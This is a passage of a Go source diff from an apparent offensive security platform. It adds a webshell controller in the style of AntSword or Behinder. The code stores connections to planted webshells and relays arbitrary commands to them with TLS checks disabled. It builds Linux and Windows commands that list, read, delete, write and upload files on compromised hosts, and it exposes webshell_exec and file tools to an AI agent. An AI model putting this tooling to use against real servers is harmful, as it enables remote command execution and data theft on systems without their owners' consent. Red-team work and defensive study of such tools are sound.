webshellSupportedOS[osTag]; !ok { + return "auto" + } + if osTag == "" { + return "auto" + } + return osTag +} + +// resolveWebshellOS 根据连接的 os 与 shellType 推断最终目标 OS(仅返回 "linux" 或 "windows")。 +// 规则: +// - 显式 linux / windows:按用户选择。 +// - auto 或未知:asp/aspx → windows,其他 → linux。保持历史行为,平滑向后兼容。 +func resolveWebshellOS(osTag, shellType string) string { + osTag = strings.ToLower(strings.TrimSpace(osTag)) + switch osTag { + case "linux": + return "linux" + case "windows": + return "windows" + } + t := strings.ToLower(strings.TrimSpace(shellType)) + if t == "asp" || t == "aspx" { + return "windows" + } + return "linux" +} + +// quoteCmdPath 把路径按 Windows cmd.exe 规则转义。 +// 使用双引号包裹,内部双引号转义为 ""(cmd 接受的写法)。 +func quoteCmdPath(p string) string { + if p == "" { + return "\".\"" + } + return "\"" + strings.ReplaceAll(p, "\"", "\"\"") + "\"" +} + +// normalizeWindowsCmdPath 把前端统一的 "/" 路径转换为 cmd 更稳定识别的 "\"。 +// 仅用于 Windows 命令构造,不改变语义(例如 "." / ".." 会保持不变)。 +func normalizeWindowsCmdPath(p string) string { + s := strings.TrimSpace(p) + if s == "" { + return s + } + return strings.ReplaceAll(s, "/", "\\") +} + +// quotePsSingle 把字符串按 PowerShell 单引号字符串规则转义(内部 ' → '')。 +// 供 PowerShell 脚本参数使用,全脚本只用单引号,外层 cmd 再用双引号包裹即可安全传递。 +func quotePsSingle(s string) string { + return "'" + strings.ReplaceAll(s, "'", "''") + "'" +} + +// quoteShellSinglePosix 把路径按 POSIX sh 单引号规则转义(内部 ' → '\'') +func quoteShellSinglePosix(p string) string { + if p == "" { + return "." + } + return "'" + strings.ReplaceAll(p, "'", "'\\''") + "'" +} + +// quoteWebshellPath 按目标 OS 选择转义方案:Linux 用 POSIX 单引号,Windows 用 cmd 双引号 +func quoteWebshellPath(path, osTag string) string { + if resolveWebshellOS(osTag, "") == "windows" { + return quoteCmdPath(path) + } + return quoteShellSinglePosix(path) +} + +// buildWindowsPowerShellWrite 构造 Windows 端把 base64 内容一次性写入目标路径的 cmd 命令。 +// 外层走 cmd.exe 的 powershell 调用,PowerShell 脚本里只用单引号字符串,避免嵌套引号陷阱。 +func buildWindowsPowerShellWrite(path, b64 string) string { + script := "$b=[Convert]::FromBase64String(" + quotePsSingle(b64) + ");" + + "[IO.File]::WriteAllBytes(" + quotePsSingle(path) + ",$b)" + return "powershell -NoProfile -NonInteractive -Command \"" + script + "\"" +} + +// buildWindowsPowerShellAppend 构造 Windows 端把 base64 内容追加写入目标路径的 cmd 命令(用于分块上传) +func buildWindowsPowerShellAppend(path, b64 string) string { + script := "$b=[Convert]::FromBase64String(" + quotePsSingle(b64) + ");" + + "$f=[IO.File]::Open(" + quotePsSingle(path) + ",[IO.FileMode]::Append,[IO.FileAccess]::Write,[IO.FileShare]::None);" + + "try{$f.Write($b,0,$b.Length)}finally{$f.Close()}" + return "powershell -NoProfile -NonInteractive -Command \"" + script + "\"" +} + +// fileCommandInput 封装 buildFileCommand 的输入,避免长参数列表 +type fileCommandInput struct { + Action string + Path string + TargetPath string + Content string + ChunkIndex int + OS string + ShellType string +} + +// buildFileCommand 根据目标 OS 与文件操作类型生成具体的远端命令字符串。 +// 同一份实现供 HTTP 入口(FileOp)与 MCP 入口(FileOpWithConnection)共用,避免双份维护。 +// 返回值第二位是用户可见的业务错误(如 "path is required")。 +func (h *WebShellHandler) buildFileCommand(in fileCommandInput) (string, error) { + targetOS := resolveWebshellOS(in.OS, in.ShellType) + action := strings.ToLower(strings.TrimSpace(in.Action)) + path := strings.TrimSpace(in.Path) + + switch action { + case "list": + p := path + if p == "" { + p = "." + } + if targetOS == "windows" { + p = normalizeWindowsCmdPath(p) + return "dir /a " + quoteCmdPath(p), nil + } + return "ls -la " + quoteShellSinglePosix(p), nil + + case "read": + if path == "" { + return "", errFileOpPathRequired + } + if targetOS == "windows" { + path = normalizeWindowsCmdPath(path) + return "type " + quoteCmdPath(path), nil + } + return "cat " + quoteShellSinglePosix(path), nil + + case "delete": + if path == "" { + return "", errFileOpPathRequired + } + if targetOS == "windows" { + path = normalizeWindowsCmdPath(path) + return "del /q /f " + quoteCmdPath(path), nil + } + return "rm -f " + quoteShellSinglePosix(path), nil + + case "mkdir": + if path == "" { + return "", errFileOpPathRequired + } + if targetOS == "windows" { + path = normalizeWindowsCmdPath(path) + // cmd 的 md 默认会自动创建中间目录(等价于 Linux 的 mkdir -p) + return "md " + quoteCmdPath(path), nil + } + return "mkdir -p " + quoteShellSinglePosix(path), nil + + case "rename": + oldPath := path + newPath := strings.TrimSpace(in.TargetPath) + if oldPath == "" || newPath == "" { + return "", errFileOpRenameNeedsBothPaths + } + if targetOS == "windows" { + oldPath = normalizeWindowsCmdPath(oldPath) + newPath = normalizeWindowsCmdPath(newPath) + return "move /y " + quoteCmdPath(oldPath) + " " + quoteCmdPath(newPath), nil + } + return "mv -f " + quoteShellSinglePosix(oldPath) + " " + quoteShellSinglePosix(newPath), nil + + case "write": + if path == "" { + return "", errFileOpPathRequired + } + // 统一策略:先把内容 base64 编码,再用目标平台对应方式解码写回, + // 这样既能写入任意二进制/含引号的文本,又避免各家 shell 的转义地狱。 + b64 := base64.StdEncoding.EncodeToString([]byte(in.Content)) + if targetOS == "windows" { + path = normalizeWindowsCmdPath(path) + return buildWindowsPowerShellWrite(path, b64), nil + } + return "echo '" + b64 + "' | base64 -d > " + quoteShellSinglePosix(path), nil + + case "upload": + if path == "" { + return "", errFileOpPathRequired + } + if len(in.Content) > 512*1024 { + return "", errFileOpUploadTooLarge + } + if targetOS == "windows" { + path = normalizeWindowsCmdPath(path) + return buildWindowsPowerShellWrite(path, in.Content), nil + } + return "echo '" + in.Content + "' | base64 -d > " + quoteShellSinglePosix(path), nil + + case "upload_chunk": + if path == "" { + return "", errFileOpPathRequired + } + if targetOS == "windows" { + path = normalizeWindowsCmdPath(path) + if in.ChunkIndex == 0 { + return buildWindowsPowerShellWrite(path, in.Content), nil + } + return buildWindowsPowerShellAppend(path, in.Content), nil + } + redir := ">>" + if in.ChunkIndex == 0 { + redir = ">" + } + return "echo '" + in.Content + "' | base64 -d " + redir + " " + quoteShellSinglePosix(path), nil + } + + return "", errFileOpUnsupportedAction(action) +} + +// 业务错误常量,便于上层统一返回用户可见提示 +var ( + errFileOpPathRequired = simpleError("path is required") + errFileOpRenameNeedsBothPaths = simpleError("path and target_path are required for rename") + errFileOpUploadTooLarge = simpleError("upload content too large (max 512KB base64)") +) + +func errFileOpUnsupportedAction(action string) error { + return simpleError("unsupported action: " + action) +} + +// simpleError 是不带堆栈的轻量错误类型,供 buildFileCommand 报可预期的参数校验错误 +type simpleError string + +func (e simpleError) Error() string { return string(e) } + +// WebShellHandler 代理执行 WebShell 命令(类似冰蝎/蚁剑),避免前端跨域并统一构建请求 +type WebShellHandler struct { + logger *zap.Logger + client *http.Client + db *database.DB + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *WebShellHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewWebShellHandler 创建 WebShell 处理器,db 可为 nil(连接配置接口将不可用) +func NewWebShellHandler(logger *zap.Logger, db *database.DB) *WebShellHandler { + return &WebShellHandler{ + logger: logger, + client: &http.Client{ + Timeout: 30 * time.Second, + Transport: &http.Transport{ + DisableKeepAlives: false, + // WebShell 场景常见自签证书或 IP 访问(证书无 IP SAN);默认跳过校验,与蚁剑等客户端一致。 + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, //nolint:gosec // intentional for webshell proxy + }, + }, + db: db, + } +} + +// CreateConnectionRequest 创建连接请求 +type CreateConnectionRequest struct { + URL string `json:"url" binding:"required"` + Password string `json:"password"` + Type string `json:"type"` + Method string `json:"method"` + CmdParam string `json:"cmd_param"` + Remark string `json:"remark"` + Encoding string `json:"encoding"` + OS string `json:"os"` +} + +// UpdateConnectionRequest 更新连接请求 +type UpdateConnectionRequest struct { + URL string `json:"url" binding:"required"` + Password string `json:"password"` + Type string `json:"type"` + Method string `json:"method"` + CmdParam string `json:"cmd_param"` + Remark string `json:"remark"` + Encoding string `json:"encoding"` + OS string `json:"os"` +} + +// ListConnections 列出所有 WebShell 连接(GET /api/webshell/connections) +func (h *WebShellHandler) ListConnections(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"}) + return + } + list, err := h.db.ListWebshellConnections() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if list == nil { + list = []database.WebShellConnection{} + } + c.JSON(http.StatusOK, list) +} + +// CreateConnection 创建 WebShell 连接(POST /api/webshell/connections) +func (h *WebShellHandler) CreateConnection(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"}) + return + } + var req CreateConnectionRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + req.URL = strings.TrimSpace(req.URL) + if req.URL == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "url is required"}) + return + } + if _, err := url.Parse(req.URL); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid url"}) + return + } + method := strings.ToLower(strings.TrimSpace(req.Method)) + if method != "get" && method != "post" { + method = "post" + } + shellType := strings.ToLower(strings.TrimSpace(req.Type)) + if shellType == "" { + shellType = "php" + } + conn := &database.WebShellConnection{ + ID: "ws_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:12], + URL: req.URL, + Password: strings.TrimSpace(req.Password), + Type: shellType, + Method: method, + CmdParam: strings.TrimSpace(req.CmdParam), + Remark: strings.TrimSpace(req.Remark), + Encoding: normalizeWebshellEncoding(req.Encoding), + OS: normalizeWebshellOS(req.OS), + CreatedAt: time.Now(), + } + if err := h.db.CreateWebshellConnection(conn); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + host := req.URL + if u, err := url.Parse(req.URL); err == nil { + host = u.Host + } + h.audit.RecordOK(c, "webshell", "connection_create", "创建 WebShell 连接", "webshell_connection", conn.ID, map[string]interface{}{ + "host": host, "type": shellType, + }) + } + c.JSON(http.StatusOK, conn) +} + +// UpdateConnection 更新 WebShell 连接(PUT /api/webshell/connections/:id) +func (h *WebShellHandler) UpdateConnection(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"}) + return + } + id := strings.TrimSpace(c.Param("id")) + if id == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"}) + return + } + var req UpdateConnectionRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + req.URL = strings.TrimSpace(req.URL) + if req.URL == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "url is required"}) + return + } + if _, err := url.Parse(req.URL); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid url"}) + return + } + method := strings.ToLower(strings.TrimSpace(req.Method)) + if method != "get" && method != "post" { + method = "post" + } + shellType := strings.ToLower(strings.TrimSpace(req.Type)) + if shellType == "" { + shellType = "php" + } + conn := &database.WebShellConnection{ + ID: id, + URL: req.URL, + Password: strings.TrimSpace(req.Password), + Type: shellType, + Method: method, + CmdParam: strings.TrimSpace(req.CmdParam), + Remark: strings.TrimSpace(req.Remark), + Encoding: normalizeWebshellEncoding(req.Encoding), + OS: normalizeWebshellOS(req.OS), + } + if err := h.db.UpdateWebshellConnection(conn); err != nil { + if err == sql.ErrNoRows { + c.JSON(http.StatusNotFound, gin.H{"error": "connection not found"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + updated, _ := h.db.GetWebshellConnection(id) + if updated != nil { + c.JSON(http.StatusOK, updated) + } else { + c.JSON(http.StatusOK, conn) + } +} + +// DeleteConnection 删除 WebShell 连接(DELETE /api/webshell/connections/:id) +func (h *WebShellHandler) DeleteConnection(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"}) + return + } + id := strings.TrimSpace(c.Param("id")) + if id == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"}) + return + } + if err := h.db.DeleteWebshellConnection(id); err != nil { + if err == sql.ErrNoRows { + c.JSON(http.StatusNotFound, gin.H{"error": "connection not found"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "webshell", "connection_delete", "删除 WebShell 连接", "webshell_connection", id, nil) + } + c.JSON(http.StatusOK, gin.H{"ok": true}) +} + +// GetConnectionState 获取 WebShell 连接关联的前端持久化状态(GET /api/webshell/connections/:id/state) +func (h *WebShellHandler) GetConnectionState(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"}) + return + } + id := strings.TrimSpace(c.Param("id")) + if id == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"}) + return + } + conn, err := h.db.GetWebshellConnection(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if conn == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "connection not found"}) + return + } + stateJSON, err := h.db.GetWebshellConnectionState(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + var state interface{} + if err := json.Unmarshal([]byte(stateJSON), &state); err != nil { + state = map[string]interface{}{} + } + c.JSON(http.StatusOK, gin.H{"state": state}) +} + +// SaveConnectionState 保存 WebShell 连接关联的前端持久化状态(PUT /api/webshell/connections/:id/state) +func (h *WebShellHandler) SaveConnectionState(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"}) + return + } + id := strings.TrimSpace(c.Param("id")) + if id == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"}) + return + } + conn, err := h.db.GetWebshellConnection(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if conn == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "connection not found"}) + return + } + var req struct { + State json.RawMessage `json:"state"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + raw := req.State + if len(raw) == 0 { + raw = json.RawMessage(`{}`) + } + if len(raw) > 2*1024*1024 { + c.JSON(http.StatusBadRequest, gin.H{"error": "state payload too large (max 2MB)"}) + return + } + var anyJSON interface{} + if err := json.Unmarshal(raw, &anyJSON); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "state must be valid json"}) + return + } + if err := h.db.UpsertWebshellConnectionState(id, string(raw)); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"ok": true}) +} + +// GetAIHistory 获取指定 WebShell 连接的 AI 助手对话历史(GET /api/webshell/connections/:id/ai-history) +func (h *WebShellHandler) GetAIHistory(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"}) + return + } + id := strings.TrimSpace(c.Param("id")) + if id == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"}) + return + } + conv, err := h.db.GetConversationByWebshellConnectionID(id) + if err != nil { + h.logger.Warn("获取 WebShell AI 对话失败", zap.String("connectionId", id), zap.Error(err)) + c.JSON(http.StatusOK, gin.H{"conversationId": nil, "messages": []database.Message{}}) + return + } + if conv == nil { + c.JSON(http.StatusOK, gin.H{"conversationId": nil, "messages": []database.Message{}}) + return + } + c.JSON(http.StatusOK, gin.H{"conversationId": conv.ID, "messages": conv.Messages}) +} + +// ListAIConversations 列出该 WebShell 连接下的所有 AI 对话(供侧边栏) +func (h *WebShellHandler) ListAIConversations(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusServiceUnavailable, gin.H{"error": "database not available"}) + return + } + id := strings.TrimSpace(c.Param("id")) + if id == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "id is required"}) + return + } + list, err := h.db.ListConversationsByWebshellConnectionID(id) + if err != nil { + h.logger.Warn("列出 WebShell AI 对话失败", zap.String("connectionId", id), zap.Error(err)) + c.JSON(http.StatusOK, []database.WebShellConversationItem{}) + return + } + if list == nil { + list = []database.WebShellConversationItem{} + } + c.JSON(http.StatusOK, list) +} + +// ExecRequest 执行命令请求(前端传入连接信息 + 命令) +type ExecRequest struct { + URL string `json:"url" binding:"required"` + Password string `json:"password"` + Type string `json:"type"` // php, asp, aspx, jsp, custom + Method string `json:"method"` // GET 或 POST,空则默认 POST + CmdParam string `json:"cmd_param"` // 命令参数名,如 cmd/xxx,空则默认 cmd + Encoding string `json:"encoding"` // 响应编码:auto / utf-8 / gbk / gb18030,空则 auto + OS string `json:"os"` // 目标操作系统:auto / linux / windows,当前 exec 不用它,保留字段便于未来扩展 + Command string `json:"command" binding:"required"` +} + +// ExecResponse 执行命令响应 +type ExecResponse struct { + OK bool `json:"ok"` + Output string `json:"output"` + Error string `json:"error,omitempty"` + HTTPCode int `json:"http_code,omitempty"` +} + +// FileOpRequest 文件操作请求 +type FileOpRequest struct { + URL string `json:"url" binding:"required"` + Password string `json:"password"` + Type string `json:"type"` + Method string `json:"method"` // GET 或 POST,空则默认 POST + CmdParam string `json:"cmd_param"` // 命令参数名,如 cmd/xxx,空则默认 cmd + Encoding string `json:"encoding"` // 响应编码:auto / utf-8 / gbk / gb18030,空则 auto + OS string `json:"os"` // 目标操作系统:auto / linux / windows,空则按 shellType 推断 + ConnectionID string `json:"connection_id,omitempty"` // 可选:连接 ID;服务端探活出 OS 后会回写到此连接 + Action string `json:"action" binding:"required"` // list, read, delete, write, mkdir, rename, upload, upload_chunk + Path string `json:"path"` + TargetPath string `json:"target_path"` // rename 时目标路径 + Content string `json:"content"` // write/upload 时使用 + ChunkIndex int `json:"chunk_index"` // upload_chunk 时,0 表示首块 +} + +// FileOpResponse 文件操作响应 +type FileOpResponse struct { + OK bool `json:"ok"` + Output string `json:"output"` + Error string `json:"error,omitempty"` + DetectedOS string `json:"detected_os,omitempty"` // 仅在 auto 模式且探活成功时返回,前端应更新本地缓存 +} + +func (h *WebShellHandler) Exec(c *gin.Context) { + var req ExecRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + req.URL = strings.TrimSpace(req.URL) + req.Command = strings.TrimSpace(req.Command) + if req.URL == "" || req.Command == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "url and command are required"}) + return + } + + parsed, err := url.Parse(req.URL) + if err != nil || (parsed.Scheme != "http" && parsed.Scheme != "https") { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid url: only http(s) allowed"}) + return + } + + useGET := strings.ToUpper(strings.TrimSpace(req.Method)) == "GET" + cmdParam := strings.TrimSpace(req.CmdParam) + if cmdParam == "" { + cmdParam = "cmd" + } + var httpReq *http.Request + if useGET { + targetURL := h.buildExecURL(req.URL, req.Type, req.Password, cmdParam, req.Command) + httpReq, err = http.NewRequest(http.MethodGet, targetURL, nil) + } else { + body := h.buildExecBody(req.Type, req.Password, cmdParam, req.Command) + httpReq, err = http.NewRequest(http.MethodPost, req.URL, bytes.NewReader(body)) + httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded") + } + if err != nil { + h.logger.Warn("webshell exec NewRequest", zap.Error(err)) + c.JSON(http.StatusInternalServerError, ExecResponse{OK: false, Error: err.Error()}) + return + } + httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)") + + resp, err := h.client.Do(httpReq) + if err != nil { + h.logger.Warn("webshell exec Do", zap.String("url", req.URL), zap.Error(err)) + c.JSON(http.StatusOK, ExecResponse{OK: false, Error: err.Error()}) + return + } + defer resp.Body.Close() + + out, readErr := io.ReadAll(resp.Body) + if readErr != nil { + h.logger.Warn("webshell exec read body", zap.Error(readErr)) + } + output := decodeWebshellOutput(out, req.Encoding) + httpCode := resp.StatusCode + + ok := resp.StatusCode == http.StatusOK + c.JSON(http.StatusOK, ExecResponse{ + OK: ok, + Output: output, + HTTPCode: httpCode, + }) +} + +// buildExecBody 按常见 WebShell 约定构建 POST 体(多数使用 pass + cmd,可配置命令参数名) +func (h *WebShellHandler) buildExecBody(shellType, password, cmdParam, command string) []byte { + form := h.execParams(shellType, password, cmdParam, command) + return []byte(form.Encode()) +} + +// buildExecURL 构建 GET 请求的完整 URL(baseURL + ?pass=xxx&cmd=yyy,cmd 可配置) +func (h *WebShellHandler) buildExecURL(baseURL, shellType, password, cmdParam, command string) string { + form := h.execParams(shellType, password, cmdParam, command) + if parsed, err := url.Parse(baseURL); err == nil { + parsed.RawQuery = form.Encode() + return parsed.String() + } + return baseURL + "?" + form.Encode() +} + +func (h *WebShellHandler) execParams(shellType, password, cmdParam, command string) url.Values { + shellType = strings.ToLower(strings.TrimSpace(shellType)) + if shellType == "" { + shellType = "php" + } + if strings.TrimSpace(cmdParam) == "" { + cmdParam = "cmd" + } + form := url.Values{} + form.Set("pass", password) + form.Set(cmdParam, command) + return form +} + +func (h *WebShellHandler) FileOp(c *gin.Context) { + var req FileOpRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + req.URL = strings.TrimSpace(req.URL) + req.Action = strings.ToLower(strings.TrimSpace(req.Action)) + if req.URL == "" || req.Action == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "url and action are required"}) + return + } + + parsed, err := url.Parse(req.URL) + if err != nil || (parsed.Scheme != "http" && parsed.Scheme != "https") { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid url: only http(s) allowed"}) + return + } + + // 若 OS 未显式配置,先发一次探活命令,识别出真实 OS 再构造文件操作命令。 + // 这解决了 "Windows + PHP + OS=auto" 场景下旧 fallback 错发 `ls -la` 导致目录列不出来的问题。 + osTag := req.OS + detectedOS := "" + if normalizeWebshellOS(osTag) == "auto" { + if probed := probeWebshellOSViaExec(h.newHTTPExecFn(req.URL, req.Password, req.Type, req.Method, req.CmdParam, req.Encoding)); probed != "" { + osTag = probed + detectedOS = probed + // 若前端带了 connection_id,顺带把探活结果持久化到该连接,后续刷新零成本 + if cid := strings.TrimSpace(req.ConnectionID); cid != "" { + h.persistDetectedOS(cid, probed) + } + } + } + + command, cmdErr := h.buildFileCommand(fileCommandInput{ + Action: req.Action, + Path: req.Path, + TargetPath: req.TargetPath, + Content: req.Content, + ChunkIndex: req.ChunkIndex, + OS: osTag, + ShellType: req.Type, + }) + if cmdErr != nil { + c.JSON(http.StatusBadRequest, FileOpResponse{OK: false, Error: cmdErr.Error()}) + return + } + + useGET := strings.ToUpper(strings.TrimSpace(req.Method)) == "GET" + cmdParam := strings.TrimSpace(req.CmdParam) + if cmdParam == "" { + cmdParam = "cmd" + } + var httpReq *http.Request + if useGET { + targetURL := h.buildExecURL(req.URL, req.Type, req.Password, cmdParam, command) + httpReq, err = http.NewRequest(http.MethodGet, targetURL, nil) + } else { + body := h.buildExecBody(req.Type, req.Password, cmdParam, command) + httpReq, err = http.NewRequest(http.MethodPost, req.URL, bytes.NewReader(body)) + httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded") + } + if err != nil { + c.JSON(http.StatusInternalServerError, FileOpResponse{OK: false, Error: err.Error()}) + return + } + httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)") + + resp, err := h.client.Do(httpReq) + if err != nil { + c.JSON(http.StatusOK, FileOpResponse{OK: false, Error: err.Error()}) + return + } + defer resp.Body.Close() + + out, readErr := io.ReadAll(resp.Body) + if readErr != nil { + h.logger.Warn("webshell fileop read body", zap.Error(readErr)) + } + output := decodeWebshellOutput(out, req.Encoding) + + c.JSON(http.StatusOK, FileOpResponse{ + OK: resp.StatusCode == http.StatusOK, + Output: output, + DetectedOS: detectedOS, + }) +} + +// ExecWithConnection 在指定 WebShell 连接上执行命令(供 MCP/Agent 等非 HTTP 调用) +func (h *WebShellHandler) ExecWithConnection(conn *database.WebShellConnection, command string) (output string, ok bool, errMsg string) { + if conn == nil { + return "", false, "connection is nil" + } + command = strings.TrimSpace(command) + if command == "" { + return "", false, "command is required" + } + useGET := strings.ToUpper(strings.TrimSpace(conn.Method)) == "GET" + cmdParam := strings.TrimSpace(conn.CmdParam) + if cmdParam == "" { + cmdParam = "cmd" + } + var httpReq *http.Request + var err error + if useGET { + targetURL := h.buildExecURL(conn.URL, conn.Type, conn.Password, cmdParam, command) + httpReq, err = http.NewRequest(http.MethodGet, targetURL, nil) + } else { + body := h.buildExecBody(conn.Type, conn.Password, cmdParam, command) + httpReq, err = http.NewRequest(http.MethodPost, conn.URL, bytes.NewReader(body)) + httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded") + } + if err != nil { + return "", false, err.Error() + } + httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)") + resp, err := h.client.Do(httpReq) + if err != nil { + return "", false, err.Error() + } + defer resp.Body.Close() + out, readErr := io.ReadAll(resp.Body) + if readErr != nil { + h.logger.Warn("webshell ExecWithConnection read body", zap.Error(readErr)) + } + return decodeWebshellOutput(out, conn.Encoding), resp.StatusCode == http.StatusOK, "" +} + +// FileOpWithConnection 在指定 WebShell 连接上执行文件操作(供 MCP/Agent 调用),支持 list / read / write +func (h *WebShellHandler) FileOpWithConnection(conn *database.WebShellConnection, action, path, content, targetPath string) (output string, ok bool, errMsg string) { + if conn == nil { + return "", false, "connection is nil" + } + action = strings.ToLower(strings.TrimSpace(action)) + // MCP 入口仅开放 list / read / write 三种动作,与工具文档的承诺保持一致 + switch action { + case "list", "read", "write": + // 支持的动作 + default: + return "", false, "unsupported action: " + action + " (supported: list, read, write)" + } + + // 若连接的 OS 为 auto,先探活并持久化,避免 AI/MCP 每次都对 Windows 发 `ls -la` + osTag := conn.OS + if normalizeWebshellOS(osTag) == "auto" { + if probed := probeWebshellOSViaExec(func(cmd string) (string, bool) { + out, exOk, _ := h.ExecWithConnection(conn, cmd) + return out, exOk + }); probed != "" { + osTag = probed + conn.OS = probed // 本次请求内使用探活结果 + h.persistDetectedOS(conn.ID, probed) + } + } + + command, cmdErr := h.buildFileCommand(fileCommandInput{ + Action: action, + Path: path, + TargetPath: targetPath, + Content: content, + OS: osTag, + ShellType: conn.Type, + }) + if cmdErr != nil { + return "", false, cmdErr.Error() + } + useGET := strings.ToUpper(strings.TrimSpace(conn.Method)) == "GET" + cmdParam := strings.TrimSpace(conn.CmdParam) + if cmdParam == "" { + cmdParam = "cmd" + } + var httpReq *http.Request + var err error + if useGET { + targetURL := h.buildExecURL(conn.URL, conn.Type, conn.Password, cmdParam, command) + httpReq, err = http.NewRequest(http.MethodGet, targetURL, nil) + } else { + body := h.buildExecBody(conn.Type, conn.Password, cmdParam, command) + httpReq, err = http.NewRequest(http.MethodPost, conn.URL, bytes.NewReader(body)) + httpReq.Header.Set("Content-Type", "application/x-www-form-urlencoded") + } + if err != nil { + return "", false, err.Error() + } + httpReq.Header.Set("User-Agent", "Mozilla/5.0 (compatible; CyberStrikeAI-WebShell/1.0)") + resp, err := h.client.Do(httpReq) + if err != nil { + return "", false, err.Error() + } + defer resp.Body.Close() + out, readErr := io.ReadAll(resp.Body) + if readErr != nil { + h.logger.Warn("webshell FileOpWithConnection read body", zap.Error(readErr)) + } + return decodeWebshellOutput(out, conn.Encoding), resp.StatusCode == http.StatusOK, "" +} diff --git a/internal/handler/webshell_context.go b/internal/handler/webshell_context.go new file mode 100644 index 00000000..6a29c908 --- /dev/null +++ b/internal/handler/webshell_context.go @@ -0,0 +1,106 @@ +package handler + +import ( + "strings" + + "cyberstrike-ai/internal/database" +) + +// WebshellSkillHintDefault 对话页 / Eino 单代理共用的 Skills 说明,放在 webshell 上下文末尾, +// 供 AI 选择 skill 加载入口时参考。 +const WebshellSkillHintDefault = "Skills 包请使用「多代理 / Eino DeepAgent」会话中的内置 `skill` 工具渐进加载。" + +// WebshellSkillHintMultiAgent 多代理 / Eino 多代理准备阶段使用的 Skills 说明 +const WebshellSkillHintMultiAgent = "Skills 包请使用 Eino 多代理内置 `skill` 工具。" + +// webshellAssistantToolList AI 助手在 WebShell 上下文下允许使用的工具清单(展示给模型用)。 +// 注意:此处只是展示字符串,真正的权限限制是在调用方设置的 roleTools 切片里。 +const webshellAssistantToolList = "webshell_exec、webshell_file_list、webshell_file_read、webshell_file_write、record_vulnerability、list_vulnerabilities、get_vulnerability、upsert_project_fact、get_project_fact、list_project_facts、search_project_facts、deprecate_project_fact、restore_project_fact、list_knowledge_risk_types、search_knowledge_base" + +// BuildWebshellAssistantContext 根据连接信息与用户原始消息组装 AI 助手的上下文提示词。 +// 上下文包含:连接 ID、备注、目标系统(及对应命令集建议)、响应编码、可用工具清单、Skills 加载入口、 +// 以及最终的用户请求。调用方只需要决定 skillHint 的文案(默认使用 WebshellSkillHintDefault)。 +// +// 之所以把这段逻辑抽到共享函数里,是为了避免 agent.go / multi_agent_prepare.go 等多处复制粘贴, +// 并确保当我们升级 OS / Encoding 文案时只需要改一处、测一处、同步生效。 +func BuildWebshellAssistantContext(conn *database.WebShellConnection, skillHint, userMsg string) string { + if conn == nil { + // 兜底:调用方已保证 conn 非 nil,这里只是防御性返回原消息 + return userMsg + } + remark := conn.Remark + if remark == "" { + remark = conn.URL + } + + targetOS := resolveWebshellOS(conn.OS, conn.Type) // 归一为 "linux" / "windows" + encoding := normalizeWebshellEncoding(conn.Encoding) + if skillHint == "" { + skillHint = 